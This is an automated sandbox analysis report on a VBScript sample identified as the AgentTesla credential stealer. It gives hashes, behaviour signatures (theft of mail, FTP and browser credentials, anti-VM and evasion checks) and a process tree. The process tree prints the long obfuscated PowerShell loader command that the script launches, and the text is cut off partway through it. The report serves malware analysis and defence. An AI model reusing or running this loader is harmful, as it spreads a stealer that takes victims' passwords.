Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
TT_COPY.vbs

Overview

General Information

Sample Name:TT_COPY.vbs
Analysis ID:758166
MD5:a27bc40b7cf1e7e7e7a9b38221d4e849
SHA1:d24c19f3cf76f8f47fa6fffb12422f0fa0252b3b
SHA256:28a30c25fb101ed42b050c4b82777929b1cdd9fe02f8f386bb9708d3adb3b9bf
Infos:

Detection

AgentTesla
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected AgentTesla
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Tries to harvest and steal ftp login credentials
Very long command line found
Potential evasive VBS script found (use of timer() function in loop)
Obfuscated command line found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
Contains functionality to call native functions
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Uses FTP
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64native
  • wscript.exe (PID: 9204 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TT_COPY.vbs" MD5: 0639B0A6F69B3265C1E42227D650B7D1)
    • powershell.exe (PID: 2556 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Vildmnd = """SaFLauConFacGatUniStoUnnLi suSSemLeeAurGltIneFrnAnsFrbAnaCarIrnPrsre0St To{Ch Ir Al Ud DopCoaSerUsaPemAn(Th[FoSRetHorKoiBonSagSu]In`$NoRAfenoguniHyoOpnMesHapFrlInathnStlVaoIsvUnsel)Bo;Hu In Po Fe Fo`$DiDOceWilMuiUnnPhtBaeHerJuvSyaNalPrlGaeTorKonIfeCosDi No=Br WhNBeetrwKo-FjOKobThjRaeLecCotUn BebStyEntCieKo[cu]Hu Cr(Hy`$mrRDreOagviiMyoBanTvsKvpEklOvaacnFrlSloHovsosPi.SuLAbeNenWagSmtHuhTh No/Be Ze2Co)St;Pe Sk Gt Mi SuFUdomerOm(cr`$ArKUblVaiOvsSetUnrEmiAznTeggeeUnrGu=Al0re;Un Tr`$SpKTjlDriMesAktSurFoiUnnCagMeeSarIc He-FalBrtKa Ac`$TiRWieUdgUdiDeoRanObsSkpRelMiaPrnAnlreoAlvInsfo.BoLTreFanPrgFrtSthDd;Uu Sp`$SyKFolGoiAlsExtinrTriLinUngSkeIcrRe+Fl=Zi2he)Le{Ga Ys Un Pa Pr Te Ta Il Af`$TrDBreNolFoiSenFotCaeBrrduvPeaArlMulIneTrrFonSheHysSa[Re`$ReKOmlPaiDasTrtBurOritenVegDoeDirOp/Sw2Be]Em Gk=Lo Co[PocOnoSunTivUneMarKrtTa]Vi:tr:WiTReoRoBVgyEttWaeDe(Ma`$GrRWheFogTuiAnoNonBysDipLolDeaFonPrlUdoFovGrsUn.PaSFoucobDusBrtForCliMenTugli(Ja`$CeKMelIciAysAftMirGriCinUvgUneStrSe,Fu te2Ho)Ko,Sk Ba1Ti6Va)Fl;Ga Va Ar`$UnDSceKelPiirenFltpeeDorTevStaColFjlTrePerAcnOveDisLa[Ca`$AfKtalIdiKlsCotskrHyiUnnBrgsueAsrte/Mo2Pe]Le Zo=Mi Ne(ne`$PiDsleaulSuiFanmytFjeAnrFevTeaPrlnolKreLurFrnByeThsOb[Ek`$BaKUdltriOrsLatserOsiChnJegSkeThrSp/Er2Mu]Bi Be-prbmeximoForGr Es1Sk6St5Fr)De;Ar kn Gi An Ma}He Vn[ReSGatakrHaiSinLogOx]fi[TaSmoyCosHatPaeChmOr.unTAleAbxOvtFo.ExEkvnNocAaoMedStiHonAsgBo]No:Bi:TiADiSBeCGrILaIHu.raGCoeVitKoSVatprrUniLanSugHa(Ec`$MaDExeKvlFaiFlnBatEnePorssvFuaJalInlIneGorExnBieWhsAn)Eq;Pa}St`$RiFUpoKorsksInkMinVeiFanDugMesrerLieBrsOvuRelHotIdaUrtDieKtrDesfa0In=SiSHimUfecergotafePrnknsvibHeaHyrEknmissi0Fi Dr'MeFSv6AfDSnCfaDSu6SuDVe1InCHj0AfCUn8Da8UdBBvCMa1BaCre9VaCOr9Sa'Un;Al`$LiFodoKerHosLikConHuiTrnSpgDoslarSueEjsTeuTelVetBiaGrtReeOvransLe1Wa=OuSLumMoeUrrBrtUmeKanHyspobMuaWirInnAnsNo0Br No'UdEAn8KoCRuCUnCdo6TrDWo7cuCcuAFaDha6LyCDiAUnCNe3KrDCa1ma8FlBImFDi2DdCDyCSaCGrBSe9Am6Ch9Ok7Re8grBskFhu0ReCFiBMoDDi6NaCCo4SkCUn3HiCBr0KeETrBPoCSh4GrDRe1AnCBoCYnDSo3MiCAf0SaEUn8SaCTo0TiDCo1ScCZoDNoCFlAMeCut1KoDSe6Bo'Sq;Gr`$FiFDooStrnosKokIdnCoiblnSkgJosSprDaeTssTeuUnlSttSvaPrtHoeChrHysDi2Ny=PoSUmmPeeKnrqutCleHonidsFobFoaPrrUnnKosPo0Ra Ve'TrEPa2ImCRe0spDpr1VaFCa5TeDPa7lyCBrAHeCSi6DiEIr4VaCFr1DaCVa1UpDDu7TeCGy0hoDRe6UdDSu6De'Me;Ud`$GrFTeolerLusCukClnRaiSanHagcisCyrBeeDesVauSylFotSkaAntmueSarUdsEt3La=RaSStmEkeSkrSatHueSunTrsInbBeaHerRonFosKu0He Co'FrFRe6slDMeCFoDin6BeDOp1ToCBu0CoCUl8Gu8MeBUnFCo7OpDMo0MaCWeBJaDVi1plCJoCArCSh8BaCSt0nu8CoBMeEReCDiCFeBTaDLy1soCOm0EuDAf7ReCSuAtoDDh5brFVa6PsCIn0FeDDi7maDBa3KaCChCReCMe6FlCde0UiDHu6Re8ReBGeEseDBaCSp4KlCStBryCca1SkCfr9DaCke0EsFMi7UnCdu0PrCAs3hf'Gr;De`$PoFChoMirPesDikFlnIniBanovgSasMarKaeGrsBeuValFotFraTrtHieAlrStsKl4Da=FoSnomfjegorSvtGreBunKasLgbSparorUnnSosIn0Al Gr'JoDAd6enDSe1PeDch7DiCPrCAmCSyBFrCPi2Mu'Ra;We`$IrFBroLurSusCoktonFeiAnnNogTasMirpieLiscauTalExtKaaSptDoeunrSisIr5Do=OcSMimBaeStrRetLteSonFusUdbGraMurFonMosDr0Me Sp'RiEUn2NeCSt0SkDFa1MaEMa8ShCLiAFoCMa1TrDSi0FlCca9SoCGr0PhEDeDDeCBu4ClCAfBExCVa1BeCEn9UnCAn0By'Ga;Fl`$StFRdoRergasprkNonNoiNrnVagSmsFortiePrsCuuGulPitlyaDitUleLlrRusZa6bi=KlSComPuePlrRitNeeManDesAtbHvaMerPonBlsRe0Ha St'DrFUn7CoFFr1GeFPh6GlDSp5PrCTi0AdCje6EkCStCLiCTe4ExCTe9ViEVaBInCPr4UdCAm8EuCCu0Sp8fe9Sh8Pl5FaENeDFaCFrCPrCSp1WhCGa0InETr7maDSkCSuFMa6UdCKaCDuCPa2Ki8Te9Bi8Pl5NiFde5GyDRi0NoCSa7PsCMe9GaCCaCklCEn6Au'Ko;Ce`$meFAioAnrAnsOpkSmnPsiannUngPisAprTreFlsBluDelAftStaLatOveberStsBr7Sa=hySTamSteGrrFotRieOfnSesTobJuaLurSonPrsEp0St Kr'ViFVu7ChDEn0SkCKiBTrDFu1ceCHjCReCSu8TaCMo0tr8Je9Cr8Te5IrEdi8BiCDo4GeCCuBOpCMi4ReCBa2KuCId0SuCCa1Pe'gi;Fl`$StFHaoForSksFokAunUniUnnScgAfsSyrAfeDisSvuKalUntalaNatSoeAarGrsSa8Bl=BeSShmpreEerTytOreKanOvsOnbPaaKnrSknFisKi0Fo Kh'LiFSw7SuCQu0BlCOg3meCSp9DrCUd0MeCRe6CrDHa1LeCKo0VeCOv1FaEIm1SiCSk0UnCAn9BeCko0AuCln2DeCAc4boDbe1PiCSu0Da'No;Fi`$KeFLaoPerBasInkScnSpiKinDigPrsSbrIreWhsSruhilBetHaaMatKaebirZasSp9He=TeSJumVseDurSetSveKongasNebAsatwrBuninsDe0Su Be'ZyESlCBrCPlBUnESl8StCAf0KaCOu8JuCFoAMaDRe7LiDBeCudELa8OpCYdALyCEk1leDMa0PrCSn9luCAf0Gr'He;Ba`$CoGPrhSpeSpgCaiResSehMe0Re=opSSomAgeSgrCotVeeAdnCosNobDoaOmrfunPhsSi0Kl Re'MeEFo8HiDMoCSaECo1DeCSh0PrCFo9DoCun0BeCUo2PoCta4FoDXe1PrCMi0InFRo1BaDViCHaDMa5SvCSu0br'bo;Lo`$ErGTahUseTagFliTisUnhPl1In=FeSSumGrePrrRitAeeCunGrsDebOvaSkrTinHesAf0Da Mi'xmEfo6TaCUn9SyCTo4LsDde6GrDUn6No8Ko9At8Os5NoFRa5OmDAn0OrCUn7StCUn9ByCRuCLiCIs6Sk8Em9Ru8No5SiFLb6opCAl0HuCCa4PiCEn9MaCPi0JuCOv1Un8Ef9Ca8Ga5ReEDr4BaCFoBShDVa6AlCquCKvEOs6AmCUp9HeCOv4ApDSa6CaDOb6Pa8Wa9Lu8Ps5LoEVa4DyDPi0ReDDi1MiCKoAStECo6UlCMa9HjCMu4OxDIm6UnDSn6Pa'Mu;Ob`$AnGRehenespgSeiansFahFe2co=AcSGymMiemurretWoeAlnYnsSebanaSlrTrnFosst0br Re'SkEFuCMoCPrBStDTe3BgCHyAOxCMoESyCBj0Bi'Ni;Da`$SuGSnhnoeFigNaisisPahDr3St=DaSJomGleBorpitDyeVanDusBibHeaSprGrndusRu0Sp Us'SeFal5BeDEr0RuCKo7CaCOp9OpCFaCReCEt6Ko8In9Re8Ry5RiEhaDPlCArCBeCGa1haCAs0BaELu7IoDBaCBoFPa6LaCInCCaCKl2Th8Ko9Op8He5InEHoBTaCMi0AfDVi2BaFSk6ReCFo9AnCDaASpDKi1Va8Ar9Al8Bi5SlFpr3VoCSlCFaDre7CuDRe1muDTa0HeCLe4OlCVo9Wr'Be;Im`$BoGTehCheSlgKeiKvsDohSl4Dy=LoSTomNjeInrBotNoeStnSvsDibPeaPlrTinOvsPi0He Ne'PrFNo3IlCEvCKlDFo7UnDRe1HeDBe0EtCPr4inCMi9FjECo4HvCOr9OmCOn9coCAnANaCBa6Ge'Kn;So`$StGChhHaeSpgMfiBrsochDi5St=DrSSpmHaeharPstdoeArnNosPibfoaCarConBusIn0Mi at'EnCCiBDiDKa1SwCHe1SkCan9UrCCo9Fo'Fl;Ga`$IdGMihDeelagTiiUdsHyhLe6Ca=FoSfomQueMarGotGreJvnPrsHjbTnaDerDinFosAs0Sp An'SvEGgBSaDDu1BiFNo5ZyDRi7JoCAnABiDSp1UsCMu0FiCSe6giDpo1ReFEg3SuCFoCKvDPe7InDRe1CoDDe0InCRa4BoCNa9UnEAp8DaCSh0smCBl8LoCGaASyDKa7AvDNiCDi'Br;Kn`$MaGSohLoeDigThifosPohSe7Br=MiSBomDiePlrSptClePenGasWobPaaPtrSlnUnsRe0Ld Mu'udETiCFaECo0DiFBeDUn'Fe;Ap`$LeGKrhMieurgGoiMasTuhHe8Op=KoSBemRaeMirfrtRheOhnClsMubLaaOmrFinvasRe0Ro Vi'grFFr9Tr'Cu;MefDiuNonAacCltyoiYooNonTv ShfSnkGypto Ho{UnPPoaGurMoaHomHy Un(My`$RyUOppAfgGarfooTewEknAc,Va Fi`$ApDafeLapSprMyeFesLosthiRioEknHjsUnpimeSerBuiStoWhdmaePrrbi)Im La Ma vi Re Kr;En`$InHUnoRoeGtrFieFrsKo0Na uf=TeSSpmGoeAdrTktmieFrntosbebFeaRirVenansLa0Bi Un'Fe8Jv1SwEChEunDPo7DeCRe8WhCSm8CeCSy0UnDEx7OmCMe0SaCKaBSu8Sy5Ud9Vi8To8in5Pa8anDFlFReEGuEAf4IcDLa5knDpo5RaECo1prCViAEnCFi8CiCAr4ViCWoCDyCSeBVaFAr8st9VaFZo9UdFCaESc6FlDKl0coDUn7KeDFl7CoChy0BrCUbBPaDBo1UnEve1DiCBiAAfCFl8SaCMa4vaChaCFaCSyBHe8EbBJuEAt2UoCPi0AeDNe1unELa4InDKa6MiDIs6FlCAu0UdCPo8NoCTi7AlCHi9UnCTeCUnCTr0FuDMy6In8liDDa8opCTe8Tr5SeDPr9Er8Bu5VrFDi2ArCLaDFuCBu0MeDPl7snCDe0Br8Ph8PaEReARrCSe7TaCflFSiCRe0UnCBl6UsDTy1Ma8Ho5GeDdrEFo8Bi5Pu8Te1AnFKoAGr8PeBFoEwo2ReCSp9TiCBeAAlCOp7EnCSe4PrCSv9SkELi4deDLo6NeDSu6OrCSv0EkCFo8faCDo7UnCOu9OpDHeCCoEIl6MuCBa4DeCNe6ClCToDCoCCe0Di8Ne5Im8Ne8AdEOp4LiCCaBLaCIc1Ko8Ku5Br8kl1moFShATr8KuBTaEWa9unCSvADaCBe6ThCKo4CoDFr1SiCOiCStCBeAJeCTaBAl8SyBwiFBu6MaDSt5PlCIs9RtCHyCTuDWh1Sp8svDPa8Co1CiEBe2LiCReDDeCNe0MoCFe2TyCBlCMeDPe6TrCRvDPo9NrDSu8StCLiFKoEde8Ko8Ac9Ta4RuFIn8Ma8fiBRyEPr0ToDSk4LiDme0ReCRe4PaCBa9AdDSk6Ka8ErDSp8Un1SeEPr3EyCcrAAvDFa7SpDUn6AeCCoEUnCKoBPrCReCReCOvBFoCBi2SuDTr6PaDTe7CoChu0LoDco6AaDVa0NoCEn9BaDSu1MeCSt4PaDMo1ChCBr0OpDJo7KuDCo6Gn9Ma5No8NeCTr8De5AnDTe8Dy8StCFa8PrBSeESn2CaCVi0EvDVe1KrFPo1InDPaCSuDHa5BiCSt0Su8AnDTa8Om1SkETy3KnCCoADiDBo7OpDBa6PaCDaEbuCBiBTrCPeCInCOtBOpCVa2UdDEf6ReDCo7BaCte0GaDSo6KoDOm0LeCRd9FoDDe1CoCSm4GaDDe1IrCOi0NyDLi7ElDFa6Li9Ov4Cl8AnCFl'Kr;Li&Bi(Ud`$BeGPlhFeeFogReiInsRehMe7Cu)Ep No`$TuHVaoBreSirDaeAmsSv0Un;Un`$IsHRuoFieFnrPrevisDi5Un Lv=St SlSStmHaeBarSmtCheSinShsBubchaBorHenPlsSp0Mu Se'Be8St1caEsu6BoCBeDViCudCPsCDi9FaCMe9En8Us5Un9Pe8So8Li5Pe8Ua1FoEUnEChDNd7OkCSv8SuCAm8RyCFr0UnDDi7SoCLa0PrCAtBTr8DoBSuESy2OuCSn0CoDFl1NrEKe8SpCBa0PrDIn1MaCTeDSeCSuAScCSa1Me8GaDTh8Es1FrEEm3YoCBiADaDbo7RuDPy6OsCBeEOpCSaBTrCEqCTjCBaBLnCHj2TrDDi6tuDPa7UrCEg0HeDEp6HaDKu0BaCPe9PrDUn1DiCTa4SuDMy1ReCKe0MaDTe7GjDIr6Di9Co7Bl8Fi9Bi8Di5ShFBiEspFKo1StDSlCCoDLa5UpCTr0spFEnEWeFUn8bgFSp8Pu8En5joEDi5De8RuDSk8La1SoEin3BoCklAToDCh7DyDDe6CeCOlEToCWiBPrCTjCYuCRuBStCFr2UnDKr6SrDNo7EnCHv0FeDJu6LeDDi0FoCBi9DeDRe1StCIm4HaDBl1GuCch0VeDDy7ToDPr6Ar9Pr6Ta8be9de8Su5Re8Pn1PaEMe3NaCApATeDCa7OxDRe6GoCAnEMiCMoBCaCNoCUfCSpBovCAn2spDNe6ByDCh7GlCMe0SuDSy6FlDRe0KwCno9OvDDe1FoCRe4noDBr1AlCUn0HiDRe7LoDor6Ru9Ek1Un8TwCIn8ViCEy'Ri;Or&no(Li`$HeGSkhJoefigFriGussthMa7Io)Ve Ty`$TyHReoDieCarLieSisAt5Li;An`$LeHAsoCeeForDeeAfsSi1Ud Pe=Da UnSChmSeeRurFetFieNenBesVibKoaagrvinOvsEx0La Hj'UnDFr7meCBe0SuDFi1SeDRe0FoDAn7TaCTrBIs8br5Pe8Di1AfERa6StCAfDDaCFoCTrCMa9UnCSp9Fl8PoBBuEwaCLoCHuBtrDVe3OuCGuAKvCMeEGrCUd0Sl8FoDOm8Hj1SlCTeBbyDIl0TjCKo9SaCAr9Vi8Un9Fo8Ad5EvETr5St8SiDunFToETvFfr6HoDRiCNaDRh6SeDno1AvCBl0UrCSp8in8TaBReFNe7FoDCr0DeCRoBTaDBe1BoCShCSqCOs8BeCSo0Po8RaBImEOvCAfCFoBReDMa1gaCRy0KoDCe7PeCMyAMeDSv5SpFRu6TaCNi0OdDAs7PlDRe3prCAmCRaCTa6SyCAn0ByDDi6Sj8noBReENeDUnCAa4UaCPiBHeCHa1DiCPa9CaCPa0GaFAn7SaCUd0PaCDe3HaFSt8Ex8ElDBiENoBShCnu0ItDBy2Co8Ac8SvEHoACyCfr7feCstFTeCEn0SwCGe6ViDBu1Di8Ti5ThFTe6HeDDiCIvDPl6AcDKs1CrCSu0EcCQu8Fo8gnBLaFCh7PrDGa0BoCNoBNeDKb1PrCDoCLaCpr8QuCbr0Je8NaBFoEWoCInCFaBReDha1emCMo0PaDMe7TuCShAKrDLa5OmFAl6SpCNe0ChDBe7BeDRe3MeCFiCIrCBr6CoCCo0ThDUn6Re8SkBUnEnuDOmCCo4AlCNaBOmCRe1WiCid9LoCMo0BoFSy7NoCCa0unCSt3Av8SiDde8EdDUtEKaBEsCKa0UnDav2Hu8Su8udEBoAJuCBu7VaCUlFOvCPe0EnCUn6KiDTr1Al8Ra5MoEDaCGyCSaBTaDBd1HjFKu5UnDHo1SkDKa7Au8FoCVe8Sp9Ua8Ir5In8PiDKo8Lo1UnEorEpeDMo7HaCKr8AfCTa8NoCPo0IrDes7LaCDr0RaCDeBSk8AtBShESc2ArCOp0BrDam1AbEKb8MaCFo0HeDLe1saCplDPlCPrABaCKa1Ho8BuDAf8Dy1CaEKa3SpCSnAekDel7SuDDi6AnCTeESaCBuBUnCErCSaCTrBEuCPa2InDPl6EnDOk7ToCSu0ObDRa6alDAf0PrCVe9ItDSn1ByCKo4clDAb1PeCAp0HeDMa7UrDdi6Af9Sp0Ra8TeCFi8UgCse8InBMeEAbCMoCHnBUnDRe3UnCSvATeCReEMeCBl0Re8BoDHe8Fa1StCtrBbeDDo0BeCUn9KiCMi9Fa8De9In8Sn5BeESt5Ea8OvDHa8Br1udFSp0HeDGa5GuCIs2LeDSi7DjCPoAsiDHe2OsCRiBUn8SaCEl8ouCRe8AnCSp8TrCDo8Ka9Hj8Jo5In8Pr1TyESm1MiCop0ViDAs5afDGr7ExCPl0AuDAc6PhDPr6CoCfoCKlCTuAUnCSnBcoDTh6ToDBe5UnCUn0PuDBr7ClCUnCFuCDeAArCMa1SeCTi0VaDTi7Fr8spCFr8MeCpe'Af;El&Ag(Ov`$BeGLahOpeChgHuiSksPrhFo7El)Se Eu`$UnHNaoEmeNurLyePasIa1Bu;Pa}DefTouRenDacAmtMaiKaoBanJe SkGDiDHaTNe aa{KaPslaJurGtaFamHa Co(Ej[SaPOpaBarSiaBemCaeThtSteoprHy(BrPUnoAnsFyiSetafiMeokinOr Kl=Sk Re0Ph,Fi FaMImaRenMidCaaCatFooKrrdkyHa Mi=Sp Su`$PeTBerZauEmeUd)Mu]Oo Sq[BeTPlybapUdeAg[Ko]Me]Av ti`$SkNTroBenFodSmeVecSuoHarAmoPruRusFrlBeyHj,fu[EwPflamarUnaTomFaeSptImeamrAu(SkPChoTosphiUjtPriRaoDinCa Si=Tr Ga1Bs)La]Ta Dd[DrTExyGipFeeEm]Me Na`$ReCunoNoeIblIniKooComFoyNoaAulgrguniDoaSk Ma=Hy Is[PrVBloCrigldNo]Bu)Au;Ma`$AnHMioSeecarPreKasKo2ex Im=Va JgSNomNoeTorDatboeAnnUnsUnbakalyrTunfrsKl0af Lo'Ne8ku1MeEFoDchCac4diDSaCBeCNoBBlCBa0PrDZa6Fo8Br5Se9Bo8Fa8Un5LdFPrESiEFa4AnDmi5HeDWe5WaEHo1PrCReAOpCYa8HeCIn4ReCBoCPeCEmBFrFSt8An9CoFUn9SpFSlESt6neDOl0AuDfl7InDOa7JeCSk0FaCUnBCoDTo1GrEsp1SnCLaATiCSo8DaCNa4EmCUnCStCcyBCy8RaBStEFl1ReCSe0PhCRa3PiCSyCStCKoBVaCSa0AuEJe1AiDEmCThCSnBVaCJu4BeCEx8ReCSoCPlCCi6BoEVa4HaDFe6KoDFa6UnCit0KeCTi8HaCWi7GrCUd9GrDDoCMo8VaDCa8rgDToEHaBLaCSu0DeDSt2Ln8ne8PhECrAPeCja7PhCsvFChCSt0ChCBa6AuDMa1He8Sh5UdFLo6SoDSaCtyDLa6PhDSy1TrCKo0HaCSp8Gu8InBSeFPe7CrCKk0DiCEm3siCSo9ReCEg0DeCSa6maDBl1VaCCaCBuCObAKrCUnBBr8CiBLtEDr4FiDIc6TsDIn6RuCCa0SkCSy8UrCGe7WoCWe9BrDCeCStEBlBAmCCo4BoCUd8WiCSk0Ch8UdDTi8Hy1OsEUn3FlCFlALyDBe7KrDsk6baCOvECaCPrBOvCUdCAnCReBUnCSr2SuDBa6CaDCo7ZoCBr0GaDDe6yoDRe0BaCUl9YaDFi1DeCBe4ReDAr1AlCAn0OrDUv7UnDsl6Kl9HuDMe8FuCCy8KaCBr8na9Pr8Hv5FaFBeESaFar6EyDGiCFrDHa6LaDmu1ReCfe0ruCUd8Ko8FaBKaFme7UnCUn0AfCAn3GlCKo9KoCMa0GoCRa6CuDSl1InCSuCHyCUnAcoCFjBEs8BrBPoEKo0vaCFl8MiCOpCSkDGr1Me8SoBMiETh4AlDTo6CaDco6maCwa0hyCpo8phCos7ChCFe9GrDCaCInEAt7foDPa0PrCNoCSkCKa9ArCTj1TyCSu0DiDCr7DiESh4UpCBe6UnCTe6StCSy0adDHa6SkDSu6NoFBe8po9InFBe9SnFBaFEl7ReDbr0LeCMiBPi8UdCDo8ReBNoEUm1StCAp0peCAm3AmCMyCpaCTyBAnCLa0FoEIl1DeDStCOpCSlBNeCWa4StCKo8VoCsnCbuCUn6OkEEn8FuCOrAOrCLi1nuDSr0DiCBi9PaCOp0Su8CoDDa8Ta1ReEKu3MyCheASmDTr7MuDAr6SaCSpEPiCErBStCdaCStCSkBMaCIm2ArDAd6SeDSp7MaCKr0UnDFy6EcDGo0PoCSu9ElDEn1GlCSn4TuDAb1DiCMi0foDOv7MeDIs6Ma9MeCBu8Pr9In8Uo5St8Ly1KaCDe3WaCMu4CeCDr9BaDso6UnCSe0qu8DeCOt8EmBKeEAt1HoCFa0HeCKa3krCBuCBaCSeBHoCAu0DoFVr1MoDOvCLoDDi5OvCMe0Pr8SeDKa8Pr1OdEBl2SoCatDBrCCu0InCTi2foCDeCUnDUn6UbCLyDMi9Di5Sm8Pe9St8Gr5Su8En1DaEEo2FiCBrDVaCga0miCCh2BrCAdCkeDMe6OuCPhDCo9Wi4Ud8Fo9In8Un5AnFSpESkFTy6InDfaCFrDTr6AsDGa1PeCIn0AbCTe8Te8IsBAmEFe8PuDOu0JaCOp9BeDBi1vaCPrCNeCAs6NoCYe4puDGe6PoDdk1ErEma1NeCOv0BuCDe9hjCKo0EnCHj2GaCJe4LuDBr1crCAf0AsFSv8Sa8InCMg'Tr;An&Vi(vu`$paGEqhsoeTugAdiTrsNohPr7Ad)sm Hu`$BoHCooBoePrrCaeSvsSy2La;Pr`$AtHDroLaeAlrUneKasSp3Re Ru=Ps LnSKomSaeTirMytHjeKonEasFobOxaRirBlnTasTa0Gu Pe'Ti8Ar1CoEStDBeCst4ReDgeCLaCOsBExCUn0RkDMo6De8DyBGiEDo1SeCan0DiCUn3TrCurCAuCOvBSyCGn0SiEda6DaCMiAMoCUnBUnDQu6UnDBe1IsDBr7GaDTu0noCha6HvDBr1ReCTaABoDAx7St8GhDRi8Me1MaEWa3SuCSyASaDTy7KoDMu6BoCSkESyCFoBScCFaCIcCPaBToCin2CaDCh6KlDAn7MaCFo0VaDCl6koDMu0UdCel9AlDUn1ReCAd4BaDLu1GuCBr0FrDMi7KoDUn6Re9To3Op8hv9St8Fo5DmFKlESaFBr6FoDUnCHyDCy6RaDpe1HoCro0SpCPr8St8DrBBoFGa7haCTo0MuCMi3MoCbr9CaCSo0SeCWe6GrDAn1MoCWiCShCEnATiCEsBOo8ElBTiERi6ErCPr4BeCAs9AnCDi9MaCBiCLoCFoBStCIc2UnEDe6SyCOvAAnCStBSpDkl3DrCSt0RiCTeBPaDIs1ReCDeCScCsaAKvCSpBIlDHe6GyFps8pl9AdFCa9geFAcFEg6SvDLe1HeCLo4VaCUnBYaCLe1FrCCy4MeDSe7InCPl1Ba8Di9Of8Pe5Sc8El1PhEKaBAvCLiABuCefBOfCSo1udCGl0FrCta6BeCSpABeDLi7alCSpASuDSt0HoDFa6BlCCo9TiDSuCPo8JaCKo8AaBTaFCr6SmCDo0DrDLi1GrEgrCBlCSp8PiDBe5VeCMi9SuCMe0elCGr8beCSt0NoCOxBSqDKv1CaCSe4VrDco1JiCLeCdrCSwASuCSeBFeEMo3RuCCo9InCLu4SoCKr2KaDTi6Sh8StDCh8Sa1NoESk3BuCChAaeDHe7IvDSk6FaCSaEReCRoBruCLoCnoCCuBKrCSp2PaDCo6SoDSa7IdCre0EjDka6AxDUn0SeCSu9CaDBe1JoCNa4HeDRu1NoCge0SpDIn7TeDno6Bo9Sp2Lo8ThCVr'In;Fr&No(Cl`$MiGorhtweStgTeiBysFahta7Ph)Ha Be`$coHNooIseRerGreDusPa3Se;Uf`$AfHHuoSceUnrSaeResMo4Su Ma=Re PhSSpmBaeFarTrtaeeScnInsInbIaaThrAnnResUn0Ev An'As8Tr1MaEYnDOpCGo4HeDUdCSpCGaBraCMa0HaDBy6En8VaBPoEBo1miCMa0SkCLa3PhCKuCDrCVeBKoCPu0StEOm8MbCFo0SaDHo1CoCMeDKoCAdAUnCSw1Fo8EfDGr8St1KlEUd2MuCHaDDeCpo0NiCFo2AfCStCViDGr6TeCSmDEr9Br7Co8Al9Ro8ch5De8di1AdEUn2SoCUrDEuCPo0BlCpi2CiCLnCTiDre6BrCAmDNe9Mi6Be8Bi9Es8Kl5In8An1DoEBe6MiCInAShCPa0MeCBr9BeCSiCBaCSmAAfCmj8KoDPrCSlCTa4ViCUd9BrCCe2weCPaCGrCBr4Dr8Sk9Tr8Un5Ch8re1PrECuBGdCHeABeCSmBMiCde1GrCSt0ZoCNe6PuCBnASkDFe7GrCHyATvDFo0InDNo6anCCy9EjDRiCFl8ToCTo8RiBAmFMe6FoCGa0VoDTa1DyEPoCanCCo8BeDBr5LyCBo9SvCPu0SyCTa8MiCCa0KoCStBKlDGr1LuCAs4ReDNo1CiCNsCLaCStAOrCunBEgEGi3ReCFi9TrCBe4unCFr2MaDOb6Ex8CiDSc8Ha1NoEUn3enCBrASlDMr7klDUr6BaCHaEMaCBiBLaCTaCMiCKoBDoCHa2PrDSl6KrDLe7GtCCo0ApDSy6FoDKv0RyCBi9DiDFr1RaCTu4PuDFr1TaCFo0ApDSu7GoDWe6Pr9In2Mo8BuCIr'Sn;Ma&Se(Fy`$OuGdrhOpeStgVeielsTuhNo7De)Hy Ph`$EfHPeoDieOvrbueHysSh4Gr;Ej`$JuHAnoBaeGrrkoeGasTa5Ca Ba=Lu UlSfrmBreHorAftTieWrnLisPlbBuaMerShnTrsKv0Ko li'OvDPe7InCrg0OuDDi1AlDTr0ApDRe7AnCAfBIn8Sl5St8Vi1PrEExDskCHa4OpDHiCLyCStBNeCSa0SaDSt6Rg8DoBDiEFo6ViDMo7DyCBo0PhChj4YaDTa1ubCSk0KnFUd1BeDhjCDuDLi5StCSj0Ov8LeDDe8KrCHa'Rg;st&An(Ko`$StGafhBoeOpgOpiFosBrhKa7Re)Sp ol`$OpHWaoPeeZarMueFisPr5Co Se Kn Fa;Le}Fo`$faURenLocFrobruObpAilHaeEn Aa=Ko FrSMomobeAbrDitBreManMasDebfoaAbrInnFesKh0Ke Ve'ReCGsEEmCte0MuDun7YoCArBUnCPa0TeCGo9ar9Ar6ra9Af7di'De;Gr`$PrHUnoYoeEfrAdeKosPl6Sy Gr=Du MaSplmgeeBirSptUneFrnPosFobSoaDirDynAfsJu0gr Tv'Au8Na1EtFBr2LaCFl0koDTr7DuCCa0UnDSk7CaCPl4brDFi1Br8Ba5eu9Ut8Dr8Gu5fiFMaEdaFFi6ToDBeCVeDWo6ChDme1VoCUn0ShCAi8Sl8UnBAnFMb7InDDv0DdCTiBEnDPu1LnCMeCGaCdi8VoCKo0Ek8saBStEinCauCGeBGaDNo1ImCPh0BoDBa7PtCOsAChDSp5SkFMa6BrCTi0SkDFl7FiDFl3WiCUdCTrCSp6DeCRe0TaDKe6Ma8s 